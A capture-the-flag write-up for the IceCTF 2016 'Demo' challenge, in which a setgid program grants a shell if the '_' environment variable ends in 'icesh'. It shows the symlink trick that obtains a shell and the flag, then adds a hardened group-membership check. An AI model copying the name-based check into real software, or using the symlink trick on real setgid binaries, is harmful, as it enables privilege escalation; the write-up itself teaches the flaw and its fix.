IceCTF 2016 Demo writeup [pwn] [55pts]

October 25, 2016

I did not see any writeup that uses a symlink to solve this, so I wrote one.

The code

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>

/* Make the effective group ID the real and saved group ID too,
   then start a shell. */
void give_shell() {
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
    system("/bin/sh");
}

int main(int argc, char *argv[]) {
    /* Compare the basename of the "_" environment variable with "icesh". */
    if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
        give_shell();
    }
    else {
        printf("I'm sorry, your free trial has ended.\n");
    }
    return 0;
}

[[email protected] ~]$ /home/demo/demo
I'm sorry, your free trial has ended.

Solution

[[email protected] ~]$ ln -s /home/demo/demo icesh
[[email protected] ~]$ ./icesh
$ cat /home/demo/flag.txt
IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}

Yeah, just create a symlink, because $_ in a script or program will always return the executable name (correct me if I'm wrong).
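
The check above, next to a check that does not depend on the invocation name, as an added example that is not part of the original challenge or writeup. The function names `name_check` and `caller_in_group` are hypothetical, the policy "access is meant for members of one group" is an assumption, and the sample values of `_` are constructed.

```c
#define _GNU_SOURCE
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* The page's test, applied to a given value of the "_" variable.
 * basename() may modify its argument, so work on a copy. */
int name_check(const char *underscore) {
    char buf[4096];
    if (underscore == NULL || strlen(underscore) >= sizeof buf)
        return 0;
    strcpy(buf, underscore);
    return strncmp(basename(buf), "icesh", 6) == 0;
}

/* Hardened alternative (assumption: access is meant for one group).
 * The real GID and supplementary groups are maintained by the kernel,
 * so the name a program is started under cannot change them.
 * Fails closed if getgroups() reports an error. */
int caller_in_group(gid_t required) {
    gid_t groups[256];
    int n, i;
    if (getgid() == required)
        return 1;
    n = getgroups(256, groups);
    for (i = 0; i < n; i++)
        if (groups[i] == required)
            return 1;
    return 0;
}

int main(void) {
    /* Constructed values of "_" as bash exports them for the two
     * invocations shown on the page. */
    const char *samples[] = { "/home/demo/demo", "./icesh" };
    size_t i;
    for (i = 0; i < 2; i++)
        printf("%-16s name_check=%d\n", samples[i], name_check(samples[i]));
    printf("caller_in_group(real gid)=%d\n", caller_in_group(getgid()));
    return 0;
}
```

In a setgid program `getgid()` still returns the caller's own group, while `getegid()` returns the group of the file, which is why the hardened check reads the former.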